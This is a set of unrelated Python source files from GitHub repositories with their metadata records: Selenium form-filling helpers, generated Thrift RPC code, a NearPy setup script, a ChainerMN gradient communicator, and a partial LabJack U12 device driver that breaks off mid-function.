wd.find_element_by_name("title").click()
wd.find_element_by_name("title").clear()
wd.find_element_by_name("title").send_keys("%s" % Contract.title)
def add_company(self, Contract):
wd = self.wd
wd.find_element_by_name("company").click()
wd.find_element_by_name("company").clear()
wd.find_element_by_name("company").send_keys("%s" % Contract.company_name)
def add_address(self, Contract):
wd = self.wd
wd.find_element_by_name("address").click()
wd.find_element_by_name("address").clear()
wd.find_element_by_name("address").send_keys("%s" % Contract.address_name)
def add_phone_number(self, Contract):
wd = self.wd
if Contract.home:
wd.find_element_by_name("home").click()
wd.find_element_by_name("home").clear()
wd.find_element_by_name("home").send_keys("%s" % Contract.home)
if Contract.mobile:
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").clear()
wd.find_element_by_name("mobile").send_keys("%s" % Contract.mobile)
if Contract.work:
wd.find_element_by_name("work").click()
wd.find_element_by_name("work").clear()
wd.find_element_by_name("work").send_keys("%s" % Contract.work)
if Contract.fax:
wd.find_element_by_name("fax").click()
wd.find_element_by_name("fax").clear()
wd.find_element_by_name("fax").send_keys("%s" % Contract.fax)
def add_email(self, Contract):
wd = self.wd
if Contract.email1:
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys("%s" % Contract.email1)
if Contract.email2:
wd.find_element_by_name("email2").click()
wd.find_element_by_name("email2").clear()
wd.find_element_by_name("email2").send_keys("%s" % Contract.email2)
if Contract.email3:
wd.find_element_by_name("email3").click()
wd.find_element_by_name("email3").clear()
wd.find_element_by_name("email3").send_keys("%s" % Contract.email3)
def add_homepage(self, homepage=None):
wd = self.wd
wd.find_element_by_name("homepage").click()
wd.find_element_by_name("homepage").clear()
wd.find_element_by_name("homepage").send_keys("%s" % homepage)
def add_year(self):
wd = self.wd
# in futures we can made function where we will sent date and it choose it with similar way as previous
if not wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[3]").click()
if not wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[2]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[2]").click()
wd.find_element_by_name("byear").click()
wd.find_element_by_name("byear").clear()
wd.find_element_by_name("byear").send_keys("1999")
if not wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[3]").click()
if not wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[2]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[2]").click()
wd.find_element_by_name("ayear").click()
wd.find_element_by_name("ayear").clear()
wd.find_element_by_name("ayear").send_keys("1999")
def add_secondary_adress(self, Contract):
wd = self.wd
wd.find_element_by_name("address2").click()
wd.find_element_by_name("address2").clear()
wd.find_element_by_name("address2").send_keys("%s" % Contract.address)
def add_secondary_home(self, Contract):
wd = self.wd
wd.find_element_by_name("phone2").click()
wd.find_element_by_name("phone2").clear()
wd.find_element_by_name("phone2").send_keys("%s" % Contract.phone)
def add_secondary_notes(self, Contract):
wd = self.wd
wd.find_element_by_name("notes").click()
wd.find_element_by_name("notes").clear()
wd.find_element_by_name("notes").send_keys("%s" % Contract.notes)
def submit_contact(self):
wd = self.wd
wd.find_element_by_xpath("//div[@id='content']/form/input[21]").click() | {
"content_hash": "ed4b49b55a34f923305b41ddc58db23c",
"timestamp": "",
"source": "github",
"line_count": 159,
"max_line_length": 119,
"avg_line_length": 44.79874213836478,
"alnum_prop": 0.59581636950723,
"repo_name": "werbk/task-2.3",
"id": "58706f53a76b42357b578e35ab873941de1f6489",
"size": "7123",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests_contract/contract_lib.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "13014"
}
],
"symlink_target": ""
} |
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
class Iface(object):
def add(self, a, b):
"""
Parameters:
- a
- b
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def add(self, a, b):
"""
Parameters:
- a
- b
"""
self.send_add(a, b)
return self.recv_add()
def send_add(self, a, b):
self._oprot.writeMessageBegin('add', TMessageType.CALL, self._seqid)
args = add_args()
args.a = a
args.b = b
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_add(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = add_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "add failed: unknown result")
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["add"] = Processor.process_add
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_add(self, seqid, iprot, oprot):
args = add_args()
args.read(iprot)
iprot.readMessageEnd()
result = add_result()
try:
result.success = self._handler.add(args.a, args.b)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("add", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class add_args(object):
"""
Attributes:
- a
- b
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'a', None, None, ), # 1
(2, TType.I32, 'b', None, None, ), # 2
)
def __init__(self, a=None, b=None,):
self.a = a
self.b = b
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.a = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.b = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('add_args')
if self.a is not None:
oprot.writeFieldBegin('a', TType.I32, 1)
oprot.writeI32(self.a)
oprot.writeFieldEnd()
if self.b is not None:
oprot.writeFieldBegin('b', TType.I32, 2)
oprot.writeI32(self.b)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class add_result(object):
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.I32, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I32:
self.success = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('add_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I32, 0)
oprot.writeI32(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| {
"content_hash": "f270f20b828a91429b1c82d9e860a375",
"timestamp": "",
"source": "github",
"line_count": 232,
"max_line_length": 134,
"avg_line_length": 30.935344827586206,
"alnum_prop": 0.5466072175003484,
"repo_name": "snower/TorThrift",
"id": "0833e3ea66670ecae87397d6e7f004c7e8acae3f",
"size": "7319",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/gen-py/example/Example.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "31913"
}
],
"symlink_target": ""
} |
import sys
from setuptools import setup
needs_pytest = {'pytest', 'test', 'ptr'}.intersection(sys.argv)
setup_requires = ['pytest-runner>=2.0,<3.0'] if needs_pytest else []
setup(
name='NearPy',
version='0.2.2',
author='Ole Krause-Sparmann',
author_email='ole@pixelogik.de',
packages=[
'nearpy',
'nearpy.distances',
'nearpy.experiments',
'nearpy.filters',
'nearpy.hashes',
'nearpy.hashes.permutation',
'nearpy.storage',
'nearpy.utils'
],
url='http://pypi.python.org/pypi/NearPy/',
license='LICENSE.txt',
description='Framework for fast approximated nearest neighbour search.',
long_description=open('README.txt').read(),
install_requires=[
"numpy",
"scipy",
"bitarray",
"future",
],
setup_requires=setup_requires,
tests_require=[
"pytest",
"redis",
"mockredispy",
]
)
| {
"content_hash": "ffa348dff659f7b99401ad2596f4cc5b",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 76,
"avg_line_length": 25,
"alnum_prop": 0.5821052631578948,
"repo_name": "akabos/NearPy",
"id": "9cdb26b4ba1f6d91f8d934ea030eff9d11b7dd96",
"size": "972",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "181780"
}
],
"symlink_target": ""
} |
import numpy as np
from chainermn.communicators import _memory_utility
from chainermn.communicators import mpi_communicator_base
class FlatCommunicator(mpi_communicator_base.MpiCommunicatorBase):
def __init__(self, mpi_comm):
super(FlatCommunicator, self).__init__(mpi_comm)
self.gpu_buffer_a = _memory_utility.DeviceMemory()
self.gpu_buffer_b = _memory_utility.DeviceMemory()
def multi_node_mean_grad(self, model, zero_fill=False):
params = _memory_utility.extract_params_set_grad(model, zero_fill)
itemsize = 4
n_elems_total = _memory_utility.count_grad_elements(params,
zero_fill)
n_bytes_total = n_elems_total * itemsize
self.gpu_buffer_a.assign(n_bytes_total)
self.gpu_buffer_b.assign(n_bytes_total)
allreduce_grad_dtype = np.float32
self._pack_params_to_buffer(params, 'grad', buffer=self.gpu_buffer_a,
allreduce_grad_dtype=allreduce_grad_dtype,
zero_fill=zero_fill)
self._multi_node_mean(self.gpu_buffer_a.array(n_elems_total),
self.gpu_buffer_b.array(n_elems_total))
self._unpack_params_from_buffer(params, 'grad', self.gpu_buffer_b,
allreduce_grad_dtype, zero_fill)
| {
"content_hash": "29d90cf40062f237ef579e2deee82580",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 78,
"avg_line_length": 41.14705882352941,
"alnum_prop": 0.5975696926375983,
"repo_name": "hvy/chainer",
"id": "c3407f3dbb6b75515106b4447daf5c490f7e11bf",
"size": "1399",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "chainermn/communicators/flat_communicator.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3796"
},
{
"name": "C",
"bytes": "1099"
},
{
"name": "C++",
"bytes": "1688016"
},
{
"name": "CMake",
"bytes": "51351"
},
{
"name": "Cuda",
"bytes": "191633"
},
{
"name": "Dockerfile",
"bytes": "6423"
},
{
"name": "PowerShell",
"bytes": "7197"
},
{
"name": "Python",
"bytes": "6425409"
},
{
"name": "Shell",
"bytes": "50581"
}
],
"symlink_target": ""
} |
"""
Name: u12.py
Desc: Defines the U12 class, which makes working with a U12 much easier. The
functions of the U12 class are divided into two categories: UW and
low-level.
Most of the UW functions are exposed as functions of the U12 class. With
the exception of the "e" functions, UW functions are Windows only. The "e"
functions will work with both the UW and the Exodriver. Therefore, people
wishing to write cross-platform code should restrict themselves to using
only the "e" functions. The UW functions are described in Section 4 of the
U12 User's Guide:
http://labjack.com/support/u12/users-guide/4
All low-level functions of the U12 class begin with the word
raw. For example, the low-level function Counter can be called with
U12.rawCounter(). Currently, low-level functions are limited to the
Exodriver (Linux and Mac OS X). You can find descriptions of the low-level
functions in Section 5 of the U12 User's Guide:
http://labjack.com/support/u12/users-guide/5
"""
import platform
import ctypes
import os, atexit
import math
from time import time
import struct
WINDOWS = "Windows"
ON_WINDOWS = (os.name == 'nt')
class U12Exception(Exception):
"""Custom Exception meant for dealing specifically with U12 Exceptions.
Error codes are either going to be a LabJackUD error code or a -1. The -1 implies
a python wrapper specific error.
def __init__(self, ec = 0, errorString = ''):
self.errorCode = ec
self.errorString = errorString
if not self.errorString:
#try:
self.errorString = getErrorString(ec)
#except:
# self.errorString = str(self.errorCode)
def __str__(self):
return self.errorString
"""
pass
class BitField(object):
"""
Provides a method for working with bit fields.
>>> bf = BitField()
>>> print bf
[ bit7 = 0, bit6 = 0, bit5 = 0, bit4 = 0, bit3 = 0, bit2 = 0, bit1 = 0, bit0 = 0 ]
You can use attribute accessing for easy bit flipping:
>>> bf.bit4 = 1
>>> bf.bit7 = 1
>>> print bf
[ bit7 = 1, bit6 = 0, bit5 = 0, bit4 = 1, bit3 = 0, bit2 = 0, bit1 = 0, bit0 = 0 ]
You can also use list-style accessing. Counting starts on the left:
>>> print bf[0] # List index 0 is bit7
1
>>> print bf[3] # List index 3 is bit4
1
List-style slicing:
>>> print bf[3:]
[1, 0, 0, 0, 0]
List-style setting bits works as you would expect:
>>> bf[1] = 1
>>> print bf
[ bit7 = 1, bit6 = 1, bit5 = 0, bit4 = 1, bit3 = 0, bit2 = 0, bit1 = 0, bit0 = 0 ]
It provides methods for going to and from bytes:
>>> bf = BitField(123)
>>> print bf
[ bit7 = 0, bit6 = 1, bit5 = 1, bit4 = 1, bit3 = 1, bit2 = 0, bit1 = 1, bit0 = 1 ]
>>> bf = BitField()
>>> bf.fromByte(123) # Modifies bf in place
>>> print bf
[ bit7 = 0, bit6 = 1, bit5 = 1, bit4 = 1, bit3 = 1, bit2 = 0, bit1 = 1, bit0 = 1 ]
>>> bf.bit4 = 0
>>> print bf.asByte()
107
You can iterate of the raw bits ( 1 and 0 Vs. '1' and '0') easily:
>>> for i in bf:
... print i
0
1
1
0
1
0
1
1
You can also iterate over the labels and their data values using items():
>>> for label, data in bf.items():
... print label, data
bit7 0
bit6 1
bit5 1
bit4 0
bit3 1
bit2 0
bit1 1
bit0 1
As an added bonus, it can also be cast as an int or hex:
>>> int(bf)
107
>>> hex(bf)
'0x6b'
See the description of the __init__ method for setting the label parameters. """
def __init__(self, rawByte = None, labelPrefix = "bit", labelList = None, zeroLabel = "0", oneLabel = "1"):
"""
Name: BitField.__init__(rawByte = None, labelPrefix = "bit",
labelList = None, zeroLabel = "0",
oneLabel = "1")
Args: rawByte, a value to set the bit field values to.
labelPrefix, what should go before the labels in labelList
labelList, a list of labels to apply to each bit. If None, it
gets set to range(7,-1,-1).
zeroLabel, bits with a value of 0 will have this label
oneLabel, bits with a value of 1 will have this label
Desc: Creates a new bitfield and sets up the labels.
With out any arguments, you get a bit field that looks like this:
>>> bf = BitField()
>>> print bf
[ bit7 = 0, bit6 = 0, bit5 = 0, bit4 = 0, bit3 = 0, bit2 = 0, bit1 = 0,
bit0 = 0 ]
To make the labels, it iterates over all the labelList and adds the
labelPrefix to them. If you have less than 8 labels, then your bit field
will only work up to that many bits.
To make a BitField with labels for FIO0-7 you can do the following:
>>> bf = BitField(labelPrefix = "FIO")
>>> print bf
[ FIO7 = 0, FIO6 = 0, FIO5 = 0, FIO4 = 0, FIO3 = 0, FIO2 = 0, FIO1 = 0,
FIO0 = 0 ]
The labels don't have to be numbers, for example:
>>> names = [ "Goodreau", "Jerri", "Selena", "Allan", "Tania",
"Kathrine", "Jessie", "Zelma" ]
>>> bf = BitField( labelPrefix = "", labelList = names)
>>> print bf
[ Goodreau = 0, Jerri = 0, Selena = 0, Allan = 0, Tania = 0,
Kathrine = 0, Jessie = 0, Zelma = 0 ]
You can change the display value of zero and one to be whatever you
want. For example, if you have a BitField that represents FIO0-7
directions:
>>> dirs = BitField(rawByte = 5, labelPrefix = "FIO",
zeroLabel = "Output", oneLabel = "Input")
>>> print dirs
[ FIO7 = Output, FIO6 = Output, FIO5 = Output, FIO4 = Output,
FIO3 = Output, FIO2 = Input, FIO1 = Output, FIO0 = Input ]
Note, that when you access the value, you will get 1 or 0, not "Input"
or "Output. For example:
>>> print dirs.FIO3
0
"""
# Do labels first, so that self.something = something works.
self.__dict__['labels'] = []
self.labelPrefix = labelPrefix
if labelList is None:
self.labelList = range(8)
else:
self.labelList = list(reversed(labelList))
self.zeroLabel = zeroLabel
self.oneLabel = oneLabel
self.rawValue = 0
self.rawBits = [ 0 ] * 8
self.data = [ self.zeroLabel ] * 8
items = min(8, len(self.labelList))
for i in reversed(range(items)):
self.labels.append("%s%s" % (self.labelPrefix, self.labelList[i]))
if rawByte is not None:
self.fromByte(rawByte)
def fromByte(self, raw):
"""
Name: BitField.fromByte(raw)
Args: raw, the raw byte to make the BitField.
Desc: Takes a byte, and modifies self to match.
>>> bf = BitField()
>>> bf.fromByte(123) # Modifies bf in place
>>> print bf
[ bit7 = 0, bit6 = 1, bit5 = 1, bit4 = 1, bit3 = 1, bit2 = 0, bit1 = 1,
bit0 = 1 ]
"""
self.rawValue = raw
self.rawBits = []
self.data = []
items = min(8, len(self.labelList))
for i in reversed(range(items)):
self.rawBits.append( ((raw >> (i)) & 1) )
self.data.append(self.oneLabel if bool(((raw >> (i)) & 1)) else self.zeroLabel)
def asByte(self):
"""
Name: BitField.asByte()
Args: None
Desc: Returns the value of the bitfield as a byte.
>>> bf = BitField()
>>> bf.fromByte(123) # Modifies bf in place
>>> bf.bit4 = 0
>>> print bf.asByte()
107
"""
byteVal = 0
for i, v in enumerate(reversed(self.rawBits)):
byteVal += ( 1 << i ) * v
return byteVal
def asBin(self):
result = "0b"
for i in self.rawBits:
result += "%s" % i
return result
def __len__(self):
return len(self.data)
def __repr__(self):
result = "["
for i in range(len(self.data)):
result += " %s = %s (%s)," % (self.labels[i], self.data[i], self.rawBits[i])
result = result.rstrip(',')
result += " ]"
return "<BitField object: %s >" % result
def __str__(self):
result = "["
for i in range(len(self.data)):
result += " %s = %s," % (self.labels[i], self.data[i])
result = result.rstrip(',')
result += " ]"
return result
def __getattr__(self, label):
try:
i = self.labels.index(label)
return self.rawBits[i]
except ValueError:
raise AttributeError(label)
def __setattr__(self, label, value):
try:
i = self.labels.index(label)
self.rawBits[i] = int(bool(value))
self.data[i] = self.oneLabel if bool(value) else self.zeroLabel
except ValueError:
self.__dict__[label] = value
def __getitem__(self, key):
return self.rawBits[key]
def __setitem__(self, key, value):
self.rawBits[key] = int(bool(value))
self.data[key] = self.oneLabel if bool(value) else self.zeroLabel
def __iter__(self):
return iter(self.rawBits)
def items(self):
"""
Name: BitField.items()
Args: None
Desc: Returns a list of tuples where the first item is the label and the
second is the string value, like "High" or "Input"
>>> dirs = BitField(rawByte = 5, labelPrefix = "FIO",
zeroLabel = "Output", oneLabel = "Input")
>>> print dirs
[ FIO7 = Output, FIO6 = Output, FIO5 = Output, FIO4 = Output,
FIO3 = Output, FIO2 = Input, FIO1 = Output, FIO0 = Input ]
>>> for label, data in dirs.items():
... print label, data
...
FIO7 Output
FIO6 Output
FIO5 Output
FIO4 Output
FIO3 Output
FIO2 Input
FIO1 Output
FIO0 Input
"""
return zip(self.labels, self.data)
def __int__(self):
return self.asByte()
def __hex__(self):
return hex(self.asByte())
def __add__(self, other):
"""
A helper to prevent having to test if a variable is a bitfield or int.
"""
return other + self.asByte()
def errcheck(ret, func, args):
if ret == -1:
try:
ec = ctypes.get_errno()
raise U12Exception("Exodriver returned error number %s" % ec)
except AttributeError:
raise U12Exception("Exodriver returned an error, but LabJackPython is unable to read the error code. Upgrade to Python 2.6 for this functionality.")
else:
return ret
def _loadLinuxSo():
try:
l = ctypes.CDLL("liblabjackusb.so", use_errno=True)
except TypeError:
l = ctypes.CDLL("liblabjackusb.so")
l.LJUSB_Stream.errcheck = errcheck
l.LJUSB_Read.errcheck = errcheck
return l
def _loadMacDylib():
try:
l = ctypes.CDLL("liblabjackusb.dylib", use_errno=True)
except TypeError:
l = ctypes.CDLL("liblabjackusb.dylib")
l.LJUSB_Stream.errcheck = errcheck
l.LJUSB_Read.errcheck = errcheck
return l
staticLib = None
if os.name == 'posix':
try:
staticLib = _loadLinuxSo()
except OSError, e:
pass # We may be on Mac.
except Exception, e:
raise U12Exception("Could not load the Linux SO for some reason other than it not being installed. Ethernet connectivity only.\n\n The error was: %s" % e)
try:
if staticLib is None:
staticLib = _loadMacDylib()
except OSError, e:
raise U12Exception("Could not load the Exodriver driver. Ethernet connectivity only.\n\nCheck that the Exodriver is installed, and the permissions are set correctly.\nThe error message was: %s" % e)
except Exception, e:
raise U12Exception("Could not load the Mac Dylib for some reason other than it not being installed. Ethernet connectivity only.\n\n The error was: %s" % e)
else:
try:
staticLib = ctypes.windll.LoadLibrary("ljackuw")
except:
raise Exception, "Could not load LabJack UW driver."
class U12(object):
"""
U12 Class for all U12 specific commands.
u12 = U12()
"""
def __init__(self, id = -1, serialNumber = None, debug = False):
self.id = id
self.serialNumber = serialNumber
self.deviceName = "U12"
self.streaming = False
self.handle = None
self.debug = debug
self._autoCloseSetup = False
if not ON_WINDOWS:
# Save some variables to save state.
self.pwmAVoltage = 0
self.pwmBVoltage = 0
self.open(id, serialNumber)
def open(self, id = -1, serialNumber = None):
"""
Opens the U12.
The Windows UW driver opens the device every time a function is called.
The Exodriver, however, works like the UD family of devices and returns
a handle. On Windows, this method does nothing. On Mac OS X and Linux,
this method acquires a device handle and saves it to the U12 object.
"""
if ON_WINDOWS:
pass
else:
if self.debug: print "open called"
devType = ctypes.c_ulong(1)
openDev = staticLib.LJUSB_OpenDevice
openDev.restype = ctypes.c_void_p
if serialNumber is not None:
numDevices = staticLib.LJUSB_GetDevCount(devType)
for i in range(numDevices):
handle = openDev(i+1, 0, devType)
if handle != 0 and handle is not None:
self.handle = ctypes.c_void_p(handle)
try:
serial = self.rawReadSerial()
except Exception:
serial = self.rawReadSerial()
if serial == int(serialNumber):
break
else:
self.close()
if self.handle is None:
raise U12Exception("Couldn't find a U12 with a serial number matching %s" % serialNumber)
elif id != -1:
numDevices = staticLib.LJUSB_GetDevCount(devType)
for i in range(numDevices):
handle = openDev(i+1, 0, devType)
if handle != 0 and handle is not None:
self.handle = ctypes.c_void_p(handle)
try:
unitId = self.rawReadLocalId()
except Exception:
unitId = self.rawReadLocalId()
if unitId == int(id):
break
else:
self.close()
if self.handle is None:
raise U12Exception("Couldn't find a U12 with a local ID matching %s" % id)
elif id == -1:
handle = openDev(1, 0, devType)
if handle == 0 or handle is None:
raise Exception("Couldn't open a U12. Check that one is connected and try again.")
else:
self.handle = ctypes.c_void_p(handle)
# U12 ignores first command, so let's write a command.
command = [ 0 ] * 8
command[5] = 0x57 # 0b01010111
try:
self.write(command)
self.read()
except:
pass
self.id = self.rawReadLocalId()
else:
raise Exception("Invalid combination of parameters.")
if not self._autoCloseSetup:
# Only need to register auto-close once per device.
atexit.register(self.close)
self._autoCloseSetup = True
def close(self):
if ON_WINDOWS:
pass
else:
staticLib.LJUSB_CloseDevice(self.handle)
self.handle = None
def write(self, writeBuffer):
if ON_WINDOWS:
pass
else:
if self.handle is None:
raise U12Exception("The U12's handle is None. Please open a U12 with open()")
if self.debug: print "Writing:", hexWithoutQuotes(writeBuffer)
newA = (ctypes.c_byte*len(writeBuffer))(0)
for i in range(len(writeBuffer)):
newA[i] = ctypes.c_byte(writeBuffer[i])
writeBytes = staticLib.LJUSB_Write(self.handle, ctypes.byref(newA), len(writeBuffer))
if(writeBytes != len(writeBuffer)):
raise LabJackException( "Could only write %s of %s bytes." % (writeBytes, len(writeBuffer) ) )
return writeBuffer
def read(self, numBytes = 8):
if ON_WINDOWS:
pass
else:
if self.handle is None:
raise U12Exception("The U12's handle is None. Please open a U12 with open()")
newA = (ctypes.c_byte*numBytes)()
readBytes = staticLib.LJUSB_Read(self.handle, ctypes.byref(newA), numBytes)
# return a list of integers in command/response mode
result = [(newA[i] & 0xff) for i in range(readBytes)]
if self.debug: print "Received:", hexWithoutQuotes(result)
return result
# Low-level helpers
def rawReadSerial(self):
"""
Name: U12.rawReadSerial()
Args: None
Desc: Reads the serial number from internal memory.
Returns: The U12's serial number as an integer.
Example:
>>> import u12
>>> d = u12.U12()
>>> print d.rawReadSerial()
10004XXXX
"""
results = self.rawReadRAM()
return struct.unpack(">I", struct.pack("BBBB", results['DataByte3'], results['DataByte2'], results['DataByte1'], results['DataByte0']))[0]
def rawReadLocalId(self):
"""
Name: U12.rawReadLocalId()
Args: None
Desc: Reads the Local ID from internal memory.
Returns: The U12's Local ID as an integer.
Example:
>>> import u12
>>> d = u12.U12()
>>> print d.rawReadLocalId()
0
"""
results = self.rawReadRAM(0x08)
return results['DataByte0']
# Begin Section 5 Functions
def rawAISample(self, channel0PGAMUX = 8, channel1PGAMUX = 9, channel2PGAMUX = 10, channel3PGAMUX = 11, UpdateIO = False, LEDState = True, IO3toIO0States = 0, EchoValue = 0):
"""
Name: U12.rawAISample(channel0PGAMUX = 8, channel1PGAMUX = 9,
channel2PGAMUX = 10, channel3PGAMUX = 11,
UpdateIO = False, LEDState = True,
IO3toIO0States = 0, EchoValue = 0)
Args: channel0PGAMUX, A byte that contains channel0 information
channel1PGAMUX, A byte that contains channel1 information
channel2PGAMUX, A byte that contains channel2 information
channel3PGAMUX, A byte that contains channel3 information
IO3toIO0States, A byte that represents the states of IO0 to IO3
UpdateIO, If true, set IO0 to IO 3 to match IO3toIO0States
LEDState, Turns the status LED on or off.
EchoValue, Sometimes, you want what you put in.
Desc: Collects readings from 4 analog inputs. It can also toggle the
status LED and update the state of the IOs. See Section 5.1 of
the User's Guide.
By default it will read AI0-3 (single-ended).
Returns: A dictionary with the following keys:
PGAOvervoltage, A bool representing if the U12 detected overvoltage
IO3toIO0States, a BitField representing the state of IO0 to IO3
Channel0-3, the analog voltage for the channel
EchoValue, a repeat of the value passed in.
Example:
>>> import u12
>>> d = u12.U12()
>>> d.rawAISample()
{
'IO3toIO0States':
<BitField object: [ IO3 = Low (0), IO2 = Low (0),
IO1 = Low (0), IO0 = Low (0) ] >,
'Channel0': 1.46484375,
'Channel1': 1.4501953125,
'Channel2': 1.4599609375,
'Channel3': 1.4306640625,
'PGAOvervoltage': False,
'EchoValue': 0
}
"""
command = [ 0 ] * 8
# Bits 6-4: PGA for 1st Channel
# Bits 3-0: MUX command for 1st Channel
command[0] = int(channel0PGAMUX)
tempNum = command[0] & 7 # 7 = 0b111
channel0Number = tempNum if (command[0] & 0xf) > 7 else tempNum+8
channel0Gain = (command[0] >> 4) & 7 # 7 = 0b111
command[1] = int(channel1PGAMUX)
tempNum = command[1] & 7 # 7 = 0b111
channel1Number = tempNum if (command[1] & 0xf) > 7 else tempNum+8
channel1Gain = (command[1] >> 4) & 7 # 7 = 0b111
command[2] = int(channel2PGAMUX)
tempNum = command[2] & 7 # 7 = 0b111
channel2Number = tempNum if (command[2] & 0xf) > 7 else tempNum+8
channel2Gain = (command[2] >> 4) & 7 # 7 = 0b111
command[3] = int(channel3PGAMUX)
tempNum = command[3] & 7 # 7 = 0b111
channel3Number = tempNum if (command[3] & 0xf) > 7 else tempNum+8
channel3Gain = (command[3] >> 4) & 7 # 7 = 0b111
# Bit 1: Update IO
# Bit 0: LED State
bf = BitField()
bf.bit1 = int(UpdateIO)
bf.bit0 = int(LEDState)
command[4] = int(bf)
# Bit 7-4: 1100 (Command/Response)
# Bit 3-0: Bits for IO3 through IO0 States
bf.fromByte(0)
bf.bit7 = 1
bf.bit6 = 1
bf.fromByte( int(bf) | int(IO3toIO0States) )
command[5] = int(bf)
command[7] = EchoValue
self.write(command)
results = self.read()
bf = BitField()
bf.fromByte(results[0])
if bf.bit7 != 1 or bf.bit6 != 0:
raise U12Exception("Expected a AIStream response, got %s instead." % results[0])
returnDict = {}
returnDict['EchoValue'] = results[1]
returnDict['PGAOvervoltage'] = bool(bf.bit4)
returnDict['IO3toIO0States'] = BitField(results[0], "IO", range(3, -1, -1), "Low", "High")
channel0 = (results[2] >> 4) & 0xf
channel1 = (results[2] & 0xf)
channel2 = (results[5] >> 4) & 0xf
channel3 = (results[5] & 0xf)
channel0 = (channel0 << 8) + results[3]
returnDict['Channel0'] = self.bitsToVolts(channel0Number, channel0Gain, channel0)
channel1 = (channel1 << 8) + results[4]
